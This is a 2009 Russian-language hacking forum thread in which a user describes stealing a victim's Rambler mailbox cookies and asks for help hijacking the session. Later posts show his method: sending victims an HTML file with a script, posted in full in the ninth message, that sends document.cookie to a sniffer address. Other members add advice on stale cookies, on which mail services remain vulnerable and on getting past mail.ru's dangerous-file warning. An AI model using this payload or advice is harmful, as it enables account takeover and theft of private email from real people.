Не могу зайти на почту!

Discussion in 'Уязвимости Mail-сервисов' started by LemoTTT, 19 May 2009.

  1. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    Проблема такова:
    Украл куки с рамблеровского ящика жертвы, куки в себе содержат такие параметры
    rmw=***********
    rmclick=***********
    begun_uuid=***********
    dv=***********
    dvr=***********
    lvr=***********
    ruid=***********
    rlogin=***********
    rup=***********
    Звездочками скрыл данные(не хочю разглашать)
    Так вот, иду в оперу заменяю куки как положено, нажимаю обновить и ничего не происходит, я остаюся в своем же ящике, посоветуйте что то?!
    или посоветуйте прогу, которой можно было бы раскодировать пароль из куки!
     
    #1 LemoTTT, 19 May 2009
    Last edited: 19 May 2009
  2. МongBa†

    МongBa† Member

    Joined:
    12 May 2009
    Messages:
    66
    Likes Received:
    12
    Reputations:
    0
    Раскодировать пароль - никак, правда ходят слухи, что есть умельцы которые извлекают из них МД5 пароля и готовы поделиться способом за $$$, но скорей всего кидалы...
    По теме - мб он нажал "Выход", либо залогинился с др. браузера после того как ты слизал куки, мб он вообще не ставил галку на "Запомнить меня"

    Вобщем устарели куки... тяни новые...
     
  3. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    удаляйте тему!
     
    #3 LemoTTT, 19 May 2009
    Last edited: 19 May 2009
  4. bagration

    bagration New Member

    Joined:
    10 Dec 2008
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    вроде как с рамблера не получится такая хренатень
     
    1 person likes this.
  5. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    Когда я присылаю жертве html файл со скриптом, который крадет куки:
    если ящик жертвы на
    1) rambler, то куки на сниффер приходят, я их заменяю,но не могу зайти в ящик жертвы!

    2)yandex, то куки вообще на сниффер не приходят!

    3)mail.ru, при получении файла , у жертвы красным написано "Потенциально опасный файл", и как ето предотвратить, уже и ссылку на сниффер кодирывал!

    Посоветуйте что и как мне лучше делать?!
     
  6. lmns

    lmns Elder - Старейшина

    Joined:
    21 Feb 2007
    Messages:
    195
    Likes Received:
    111
    Reputations:
    8
    ты одну XSS на 3 почтовика юзаешь? o_O
     
  7. FatalLerr0r

    FatalLerr0r Member

    Joined:
    15 Apr 2009
    Messages:
    33
    Likes Received:
    6
    Reputations:
    0
    На рамблере такая штука уже непройдет, непытайся, а насчет @mail.ru и @yandex.ru то там все ок пашет!
     
  8. timeR

    timeR Member

    Joined:
    13 May 2009
    Messages:
    15
    Likes Received:
    32
    Reputations:
    -5
    ты скрипт то хоть покажи, как я понял ты вообще xss не юзаешь 8D
     
    6 people like this.
  9. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    HTML:
    <script>img = new Image(); img.src = "адресс сниффера"+document.cookie;</script>
    адресс сниффера закодирован
    ЗЫ: xss бред, лично мое мнение!
     
  10. timeR

    timeR Member

    Joined:
    13 May 2009
    Messages:
    15
    Likes Received:
    32
    Reputations:
    -5
    8D промолчу...
     
    5 people like this.